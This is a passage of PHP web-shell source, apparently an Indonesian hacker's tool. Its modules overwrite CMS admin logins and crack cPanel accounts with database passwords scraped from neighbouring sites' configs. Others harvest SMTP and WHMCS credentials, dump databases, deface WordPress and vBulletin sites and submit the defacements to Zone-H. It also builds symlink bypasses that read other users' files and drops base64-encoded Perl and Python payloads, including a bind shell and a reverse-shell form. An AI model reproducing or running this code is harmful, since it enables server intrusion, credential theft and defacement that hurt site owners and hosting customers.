                                $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
                            }
                        }
                    } else {
                        $cek_login = file_get_contents("$target/adminweb/");
                        $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
                        if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
                            $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
                        } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
                            $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
                        } else {
                            $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
                        }
                    }
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
                    echo "Config => ".$file_conf."<br>";
                    echo "CMS => Lokomedia<br>";
                    if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
                        echo $url_target2;
                    } else {
                        echo $url_target;
                    }
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
						echo "</div>";
					}
                    mysql_close($conn);
                }
            }
        }
    } else {
        echo "<center>
        <h3>Auto Edit User Config</h3>
        <form method='post'>
        DIR Config: <br>
        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
        Set User & Pass: <br>
        <input type='text' name='user_baru' value='mrxbarakuda' placeholder='user_baru'><br>
        <input type='text' name='pass_baru' value='mrxbarakuda' placeholder='pass_baru'><br>
        <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
        </form>
        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
        ";
    }
}
elseif($_GET['do'] == 'cpcrack') {
	if($_POST['crack']) {
		$usercp = explode("
", $_POST['user_cp']);
		$passcp = explode("
", $_POST['pass_cp']);
		$i = 0;
		foreach($usercp as $ucp) {
			foreach($passcp as $pcp) {
				if(@mysql_connect('localhost', $ucp, $pcp)) {
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
					} else {
						$_SESSION[$ucp] = "1";
						$_SESSION[$pcp] = "1";
						if($ucp == '' || $pcp == '') {
							
						} else {
							$i++;
							if(function_exists('posix_getpwuid')) {
								$domain_cp = file_get_contents("/etc/named.conf");	
								if($domain_cp == '') {
									$dom =  "<font color=red>gabisa ambil nama domain nya</font>";
								} else {
									preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
									foreach($domains_cp[1] as $dj) {
										$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
										$user_cp_url = $user_cp_url['name'];
										if($user_cp_url == $ucp) {
											$dom = "<a href='http://$dj/' target='_blank'><font color=deepskyblue>$dj</font></a>";
											break;
										}
									}
								}
							} else {
								$dom = "<font color=red>function is Disable by system</font>";
							}
							echo "username (<font color=deepskyblue>$ucp</font>) password (<font color=deepskyblue>$pcp</font>) domain ($dom)<br>";
						}
					}
				}
			}
		}
		if($i == 0) {
		} else {
			echo "<br>sukses nyolong ".$i." Cpanel by <font color=cyan>Mr.xBarakuda</font>";
		}
	} else {
		echo "<center>
		<form method='post'>
		USER: <br>
		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
		$_usercp = fopen("/etc/passwd","r");
		while($getu = fgets($_usercp)) {
			if($getu == '' || !$_usercp) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all("/(.*?):x:/", $getu, $u);
				foreach($u[1] as $user_cp) {
						if(is_dir("/home/$user_cp/public_html")) {
							echo "$user_cp
";
					}
				}
			}
		}
		echo "</textarea><br>
		PASS: <br>
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
		function cp_pass($dir) {
			$pass = "";
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				if(!is_file("$dir/$dirb")) continue;
				$ambil = file_get_contents("$dir/$dirb");
				if(preg_match("/WordPress/", $ambil)) {
					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."
";
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
					$pass .= ambilkata($ambil,"password = '","'")."
";
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."
";
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
					$pass .= ambilkata($ambil,'password = "','"')."n";
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."
";
				} elseif(preg_match("/^[client]$/", $ambil)) {
					preg_match("/password=(.*?)/", $ambil, $pass1);
					if(preg_match('/"/', $pass1[1])) {
						$pass1[1] = str_replace('"', "", $pass1[1]);
						$pass .= $pass1[1]."
";
					} else {
						$pass .= $pass1[1]."
";
					}
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
					$pass .= ambilkata($ambil,"db_password = '","'")."
";
				}
			}
			echo $pass;
		}
		$cp_pass = cp_pass($dir);
		echo $cp_pass;
		echo "</textarea><br>
		<input type='submit' name='crack' style='width: 450px;' value='Crack'>
		</form>
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center>";
	}
}
elseif($_GET['do'] == 'smtp') {
    function scj($dir) {
        $dira = scandir($dir);
        foreach($dira as $dirb) {
            if(!is_file("$dir/$dirb")) continue;
            $ambil = file_get_contents("$dir/$dirb");
            $ambil = str_replace("$", "", $ambil);
            if(preg_match("/JConfig|joomla/", $ambil)) {
                $smtp_host = ambilkata($ambil,"smtphost = '","'");
                $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
                $smtp_user = ambilkata($ambil,"smtpuser = '","'");
                $smtp_pass = ambilkata($ambil,"smtppass = '","'");
                $smtp_port = ambilkata($ambil,"smtpport = '","'");
                $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
                echo "<center>";
                echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
                echo "SMTP port: <font color=lime>$smtp_port</font><br>";
                echo "SMTP user: <font color=lime>$smtp_user</font><br>";
                echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
                echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
                echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
            }
        }
    }
    $smpt_hunter = scj($dir);
    echo $smpt_hunter;
    echo "<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center>";
}
elseif($_GET['do'] == 'auto_wp') {
    if($_POST['hajar']) {
        $title = htmlspecialchars($_POST['new_title']);
        $pn_title = str_replace(" ", "-", $title);
        if($_POST['cek_edit'] == "Y") {
            $script = $_POST['edit_content'];
        } else {
            $script = $title;
        }
        $conf = $_POST['config_dir'];
        $scan_conf = scandir($conf);
        foreach($scan_conf as $file_conf) {
            if(!is_file("$conf/$file_conf")) continue;
            $config = file_get_contents("$conf/$file_conf");
            if(preg_match("/WordPress/", $config)) {
                $dbhost = ambilkata($config,"DB_HOST', '","'");
                $dbuser = ambilkata($config,"DB_USER', '","'");
                $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
                $dbname = ambilkata($config,"DB_NAME', '","'");
                $dbprefix = ambilkata($config,"table_prefix  = '","'");
                $prefix = $dbprefix."posts";
                $option = $dbprefix."options";
                $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                $db = mysql_select_db($dbname);
                $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
                $result = mysql_fetch_array($q);
                $id = $result[ID];
                $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
                $result2 = mysql_fetch_array($q2);
                $target = $result2[option_value];
                $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
                $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
				echo "<div style='margin: 5px auto;'>";
                if($target == '') {
                    echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
                } else {
                    echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
                }
                if(!$update OR !$conn OR !$db) {
                    echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
                } else {
                    echo "<font color=lime>sukses di ganti.</font><br>";
                }
                echo "</div>";
                mysql_close($conn);
            }
        }
    } else {
        echo "<center>
        <h3>Auto Edit Title+Content WordPress</h3>
        <form method='post'>
        DIR Config: <br>
        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
        Set Title: <br>
        <input type='text' name='new_title' value='Visited By Mr.xBarakuda' placeholder='New Title'><br><br>
        Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
        <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
        <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
        <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
        </form>
        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
        ";
    }
}
elseif($_GET['do'] == 'zoneh') {
  if($_POST['submit']) {
    $domain = explode("
", $_POST['url']);
    $nick =  $_POST['nick'];
    echo "<font color='white'>Defacer Onhold:</font> <a href='http://zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://zone-h.org/archive/notifier=$nick/published=0</a><br>";
    echo "<font color='white'>Defacer Archive:</font> <a href='http://zone-h.org/archive/notifier=$nick' target='_blank'>http://zone-h.org/archive/notifier=$nick</a><br><br>";
    function zoneh($url,$nick) {
      $ch = curl_init("http://zone-h.org/notify/single");
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      curl_setopt($ch, CURLOPT_POST, true);
      curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
      return curl_exec($ch);
      curl_close($ch);
    }
    foreach($domain as $url) {
      $zoneh = zoneh($url,$nick);
      if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
        echo "$url -> <font color=lime>OK</font><br>";
      } else {
        echo "$url -> <font color=red>ERROR</font><br>";
      }
    }
  } else {
    echo "<center><h3>Zone-H Mass Poster</h3>";
    echo "
        <form method='post'>
        <u>Notifier:</u><br>
        <input type='text' name='nick' size='50' value='Mr.xBarakuda'><br>
        <u>Domains:</u><br>
        <textarea style='width: 450px; height: 150px;' placeholder='http://maqlohaiker.go.id/' name='url'></textarea><br>
        <input type='submit' name='submit' value='Submit' style='width:450px;'>
        </form>";
      }
      echo "</center>";
}
elseif(isset($_GET['do']) && ($_GET['do'] == 'whmcsdeco')) {
function decrypt ($string,$cc_encryption_hash) {
    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    $hash_length = strlen ($hash_key);
    $string = base64_decode ($string);
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    while ($c < $hash_length)
    {
        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
        ++$c;
    }
    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
        if (($c != 0 AND $c % $hash_length == 0))
        {
            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
        }
        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
        ++$c;
    }
    return $out;
}

function _hash ($string)
{
    if (function_exists ('sha1'))
    {
        $hash = sha1 ($string);
    }
    else
    {
        $hash = md5 ($string);
    }
    $out = '';
    $c = 0;
    while ($c < strlen ($hash))
    {
        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
        $c += 2;
    }
    return $out;
}

echo "
<center><h3>WHMCS Decoder</h3>
<form action=''  method='post'>
<input type='hidden' name='form_action' value='2'>
<br>
<table class='tabnet' style='width:320px;padding:0 1px;'>
<tr><td>db_host: </td><td><input type='text' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
<tr><td>db_username: </td><td><input type='text' class='inputz' size='38' name='db_username' value=''></td></tr>
<tr><td>db_password: </td><td><input type='text' class='inputz' size='38' name='db_password' value=''></td></tr>
<tr><td>db_name: </td><td><input type='text' class='inputz' size='38' name='db_name' value=''></td></tr>
<tr><td>cc_encryption_hash: </td><td><input type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
<td><input class='inputzbut' type='submit' value='Submit' name='Submit' align='center'></td>
</table></form></center>";

 if($_POST['form_action'] == 2 )
 {
 //include($file);
 $db_host=($_POST['db_host']);
 $db_username=($_POST['db_username']);
 $db_password=($_POST['db_password']);
 $db_name=($_POST['db_name']);
 $cc_encryption_hash=($_POST['cc_encryption_hash']);

$link=mysql_connect($db_host,$db_username,$db_password);
mysql_select_db($db_name,$link);
$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>Username</td><td>$username</td></tr>");
echo("<tr><td>Password</td><td>$password</td></tr>");

echo "</table><br><br></center>";
}

$link=mysql_connect($db_host,$db_username,$db_password);
mysql_select_db($db_name,$link);
$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {
$registrar     = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
}
}
}
elseif($_GET['do'] == 'dbdump') {
echo $head.'<p align="center">';
echo '
<center><form action method=post>
<table width=365 class=tabnet >
<tr><th colspan="2"><h3>Database Dump</h3></th></tr>
<tr>
	<td>Server </td>
	<td><input class="inputz" type=text name=server size=52></td></tr><tr>
	<td>Username</td>
	<td><input class="inputz" type=text name=username size=52></td></tr><tr>
	<td>Password</td>
	<td><input class="inputz" type=text name=password size=52></td></tr><tr>
	<td>DataBase Name</td>
	<td><input class="inputz" type=text name=dbname size=52></td></tr>
	<tr>
	<td>DB Type </td>
	<td><form method=post action="'.$me.'">
	<select class="inputz" name=method>
		<option  value="gzip">Gzip</option>
		<option value="sql">Sql</option>
		</select>
	<input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
	</form></center></table></center>';
if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
$date = date("Y-m-d");
$dbserver = $_POST['server'];
$dbuser = $_POST['username'];
$dbpass = $_POST['password'];
$dbname = $_POST['dbname'];
$file = "Dump-$dbname-$date";
$method = $_POST['method'];
if ($method=='sql'){
$file="Dump-$dbname-$date.sql";
$fp=fopen($file,"w");
}else{
$file="Dump-$dbname-$date.sql.gz";
$fp = gzopen($file,"w");
}
function write($data) {
global $fp;
if ($_POST['method']=='ssql'){
fwrite($fp,$data);
}else{
gzwrite($fp, $data);
}}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables)) {
    $i = $i['Tables_in_'.$dbname];
    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
    write($create['Create Table'].";");
    $sql = mysql_query ("SELECT * FROM ".$i);
    if (mysql_num_rows($sql)) {
        while ($row = mysql_fetch_row($sql)) {
            foreach ($row as $j => $k) {
                $row[$j] = "'".mysql_escape_string($k)."'";
            }
            write("INSERT INTO $i VALUES(".implode(",", $row).");
");
        }
    }
}
if ($method=='ssql'){
fclose ($fp);
}else{
gzclose($fp);}
header("Content-Disposition: attachment; filename=" . $file);   
header("Content-Type: application/download");
header("Content-Length: " . filesize($file));
flush();

$fp = fopen($file, "r");
while (!feof($fp))
{
    echo fread($fp, 65536);
    flush();
} 
fclose($fp); 
}
}
elseif($_GET['do'] == 'symlink') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
$d0mains = @file("/etc/named.conf");
##httaces
if($d0mains){
@mkdir("kuda_sym",0777);
@chdir("kuda_sym");
@exe("ln -s / root");
$file3 = 'Options Indexes FollowSymLinks
DirectoryIndex kuda.html
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);@fclose($fp3);
echo "
<table align=center border=1 style='width:70%;border-color:#333333;'>
<tr>
<td align=center>-<font size=3>-S. No.-</font></td>
<td align=center>-<font size=3>-Domains-</font></td>
<td align=center>-<font size=3>-Users-</font></td>
<td align=center>-<font size=3>-Symlink-</font></td>
</tr>";
$dcount = 1;
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
<td>".$user['name']."</td>
<td><a href='$full/kuda_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
flush();
$dcount++;}}}
echo "</table>";
}else{
$TEST=@file('/etc/passwd');
if ($TEST){
@mkdir("kuda_sym",0777);
@chdir("kuda_sym");
exe("ln -s / root");
$file3 = 'Options Indexes FollowSymLinks
DirectoryIndex kuda.html
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
 $fp3 = fopen('.htaccess','w');
 $fw3 = fwrite($fp3,$file3);
 @fclose($fp3);
 echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>-S. No.-</font></td>
 <td align=center><font size=3>-Users-</font></td>
 <td align=center><font size=3>-Symlink-</font></td></tr>";
 $dcount = 1;
 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
 while(!feof($file)){
 $s = fgets($file);
 $matches = array();
 $t = preg_match('//(.*?)://s', $s, $matches);
 $matches = str_replace("home/","",$matches[1]);
 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
 continue;
 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
 echo "<td align=center><font class=txt><a href=$full/kuda_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
 $dcount++;}fclose($file);
 echo "</table>";}else{if($os != "Windows"){@mkdir("kuda_sym",0777);@chdir("kuda_sym");@exe("ln -s / root");$file3 = '
Options Indexes FollowSymLinks
DirectoryIndex kuda.html
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any
';
 $fp3 = fopen('.htaccess','w');
 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
 echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>ID</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>";
 $temp = "";$val1 = 0;$val2 = 1000;
 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
 if ($uid)$temp .= join(':',$uid)."n";}
 echo '<br/>';$temp = trim($temp);$file5 =
 fopen("test.txt","w");
 fputs($file5,$temp);
 fclose($file5);$dcount = 1;$file =
 fopen("test.txt", "r") or exit("Unable to open file!");
 while(!feof($file)){$s = fgets($file);$matches = array();
 $t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
 continue;
 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
 echo "<td align=center><font class=txt><a href=$full/kuda_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
 $dcount++;}
 fclose($file);
 echo "</table></div></center>";unlink("test.txt");
 } else
 echo "<center><font size=3>Cannot create Symlink</font></center>";
 }
 }
}
elseif($_GET['do'] == 'sympy') {
	$sym_dir = mkdir('kuda_sympy', 0755);
    chdir('kuda_sympy');
	$file_sym = "sym.py";
	$sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIlNwZWNpYWwgR3JlZXR6IHRvIDogUGFrIEN5YmVyIFNrdWxseiINCnByaW50ICJ+Iio2MA0KDQpvcy5tYWtlZGlycygna3VkYXN5bXB5JykNCm9zLmNoZGlyKCdrdWRhc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGt1ZGEudHh0IikNCg0KaCA9ICJPcHRpb25zIEluZGV4ZXMgRm9sbG93U3ltTGlua3NcbkRpcmVjdG9yeUluZGV4IGt1ZGEucGh0bWxcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiDQptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQ0KbS53cml0ZShoKQ0KbS5jbG9zZSgpDQpwcmludCBodGENCg0Kc2YgPSAiPGh0bWw+PHRpdGxlPlN5bWxpbmsgUHl0aG9uPC90aXRsZT48Y2VudGVyPjxmb250IGNvbG9yPXdoaXRlIHNpemU9NT5TeW1saW5rIEJ5cGFzcyAyMDE3PGJyPjxmb250IHNpemU9ND5NYWRlIEJ5IE1pbmRsZXNzIEluamVjdG9yIDxicj5SZWNvZGVkIEJ5IE1yLnhCYXJha3VkYTwvZm9udD48L2ZvbnQ+PGJyPjxmb250IGNvbG9yPXdoaXRlIHNpemU9Mz48dGFibGU+Ig0KDQpvID0gb3BlbignL2V0Yy9wYXNzd2QnLCdyJykNCm89by5yZWFkKCkNCm8gPSByZS5maW5kYWxsKCcvaG9tZS9cdysnLG8pDQoNCmZvciB4dXNyIGluIG86DQoJeHVzcj14dXNyLnJlcGxhY2UoJy9ob21lLycsJycpDQoJc3Vzci5hcHBlbmQoeHVzcikNCnByaW50ICItIiozMA0KeHNpdGUgPSBvcy5saXN0ZGlyKCIvdmFyL25hbWVkIikNCg0KZm9yIHh4c2l0ZSBpbiB4c2l0ZToNCgl4eHNpdGU9eHhzaXRlLnJlcGxhY2UoIi5kYiIsIiIpDQoJc2l0ZXguYXBwZW5kKHh4c2l0ZSkNCnByaW50IGYNCnBhdGg9b3MuZ2V0Y3dkKCkNCmlmICIvcHVibGljX2h0bWwvIiBpbiBwYXRoOg0KCXBhdGg9Ii9wdWJsaWNfaHRtbC8iDQplbHNlOg0KCXBhdGggPSAiL2h0bWwvIg0KY291bnRlcj0xDQppcHM9b3Blbigia3VkYS5waHRtbCIsInciKQ0KaXBzLndyaXRlKHNmKQ0KDQpmb3IgZnVzciBpbiBzdXNyOg0KCWZvciBmc2l0ZSBpbiBzaXRleDoNCgkJZnU9ZnVzclswOjVdDQoJCXM9ZnNpdGVbMDo1XQ0KCQlpZiBmdT09czoNCgkJCWlwcy53cml0ZSgiPGJvZHkgYmdjb2xvcj1ibGFjaz48dHI+PHRkIHN0eWxlPWZvbnQtZmFtaWx5OmNhbGlicmk7Zm9udC13ZWlnaHQ6Ym9sZDtjb2xvcjp3aGl0ZTs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6cmVkOz4lczwvdGQ+PHRkIHN0eWxlPWZvbnQtZmFtaWx5OmNhbGlicmk7Zm9udC13ZWlnaHQ6Ym9sZDs+PGEgaHJlZj1rdWRhLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx";
        $sym = fopen($file_sym, "w");
	fwrite($sym, base64_decode($sym_script));
	chmod($file_sym, 0755);
        $kuda = exe("python sym.py");
	echo "<center><a href='kuda_sympy/kudasympy/' target='_blank'><font color='lime'>Clik Here</a></font></center>";
}
elseif($_GET['do'] == 'vb_ngindex') {
	{
?>
<form action="" method="post">
<center><h3>VB Index Changer</h3></center>
<?php
if(empty($_POST['index'])) {
echo "<center><form method='post'><table>
<tr><td>Host: </td><td><input class='inputz' type='text' size='52' name='localhost' placeholder='localhost'></td></tr><br>
<tr><td>Database: </td><td><input class='inputz' type='text' size='52' name='database' placeholder='forum_vb'></td></tr><br>
<tr><td>Username: </td><td><input class='inputz' type='text' size='52' name='username' placeholder='user_vb'></td></tr><br>
<tr><td>Password: </td><td><input class='inputz' type='text' size='52' name='password' placeholder='vb'></td></tr></table><br>
<th colspan='2'>Your Index Code</th><br>
<textarea name='index' rows='13' style='width: 450px; height: 200px;' border='1' cols='69' name='code'>Your Index Code Here...</textarea><br>
<input class='inputzbut' type='submit' value='Setting!' name='send'>
</form></center></table>";
    }else{
    $localhost = $_POST['localhost'];
    $database = $_POST['database'];
    $username = $_POST['username'];
    $password = $_POST['password'];
    $index = $_POST['index'];
    @mysql_connect($localhost,$username,$password) or die(mysql_error());
    @mysql_select_db($database) or die(mysql_error());
    $index=str_replace("'","'",$index);
    $set_index = "{${eval(base64_decode('";
    $set_index .= base64_encode("echo "$index";");
    $set_index .= "'))}}{${exit()}}</textarea>";
    echo("SET template ='".$set_index."' ") ;
    $ok=@mysql_query("SET template ='".$set_index."'") or die(mysql_error());
    if($ok){
    echo "<center>Update success...</center>";
    } 
  }
}
}
elseif($_GET['do'] == 'bctools'){
      echo "<center><h3>Back Connect Tools</h3>";
      echo "<form method='post'>
      <span>Bind port to /bin/sh [Perl]</font></span><br/>
      Port: <input type='text' name='port' placeholder='666'> <input type='submit' name='bpl' value='>>'>
      <br><br>
      <span>Back-Connect</span><br/>
      Server: <input type='text' name='server' placeholder='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' placeholder='666'><select class='select' name='backconnect'  style='width: 100px;' height='10'><option value='perl'>Perl</option><option value='php'>PHP</option><option value='python'>Python</option><option value='ruby'>Ruby</option></select> <input type=submit value='>>'>";
      echo "</form>";
      echo "</center>";
        if($_POST['bpl']) {
        $bp=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
